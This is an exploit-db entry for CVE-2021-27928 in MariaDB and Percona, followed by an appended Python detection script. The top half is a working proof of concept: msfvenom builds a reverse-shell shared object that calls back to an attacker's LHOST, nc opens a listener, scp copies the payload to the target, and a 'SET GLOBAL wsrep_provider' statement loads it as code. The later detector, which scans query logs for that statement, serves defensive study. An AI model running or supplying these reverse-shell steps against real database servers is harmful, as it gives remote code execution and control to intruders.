MariaDB 10.2 – ‘wsrep_provider’ OS Command Execution

  • Author: Central InfoSec
    Date: 2021-04-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49765/

# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
# Date: 03/18/2021
# Exploit Author: Central InfoSec
# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
# Tested on: Linux
# CVE : CVE-2021-27928

# Proof of Concept:

# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

# Start a listener
nc -lvp <port>

# Copy the payload to the target machine (In this example, SCP/SSH is used)
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so

# Execute the payload
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
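The statement in the last step is the event a defender can look for. As an added detection example (not part of the exploit-db entry), the Python check below scans MariaDB general-log lines for `SET GLOBAL wsrep_provider` assignments whose library path lies outside the expected Galera install directories; the allowed directories and the sample log lines are constructed assumptions.

```python
import re

# Directories where a legitimate Galera provider library is normally installed.
# Assumption: adjust to the actual location on the audited host.
ALLOWED_PROVIDER_DIRS = ("/usr/lib/galera/", "/usr/lib64/galera/")

# Matches SET GLOBAL wsrep_provider = '...' (also the @@GLOBAL. spelling),
# case-insensitive, tolerating extra whitespace around '='.
PROVIDER_SET = re.compile(
    r"SET\s+(?:GLOBAL\s+|@@GLOBAL\.)?wsrep_provider\s*=\s*['\"]([^'\"]+)['\"]",
    re.IGNORECASE,
)


def find_suspicious_provider_sets(log_lines):
    """Return one finding per line that points wsrep_provider at an unexpected path."""
    findings = []
    for line in log_lines:
        match = PROVIDER_SET.search(line)
        if not match:
            continue
        path = match.group(1)
        # 'none' disables the provider; it does not load a library.
        if path.lower() == "none":
            continue
        if not any(path.startswith(d) for d in ALLOWED_PROVIDER_DIRS):
            findings.append({"path": path, "line": line})
    return findings


# Constructed sample general-log lines, not real captures.
SAMPLE_LOG = [
    "210318 10:01:02\t 42 Query\tSELECT 1",
    "210318 10:01:05\t 42 Query\tSET GLOBAL wsrep_provider='/usr/lib/galera/libgalera_smm.so'",
    "210318 10:02:11\t 43 Query\tSET GLOBAL wsrep_provider=\"/tmp/CVE-2021-27928.so\"",
    "210318 10:02:30\t 43 Query\tSET GLOBAL wsrep_provider='none'",
]

if __name__ == "__main__":
    for finding in find_suspicious_provider_sets(SAMPLE_LOG):
        print("suspicious wsrep_provider load:", finding["path"])
```

The check only sees statements that are logged, so the general query log (or an audit plugin that records the statement text) must be enabled on the server being monitored.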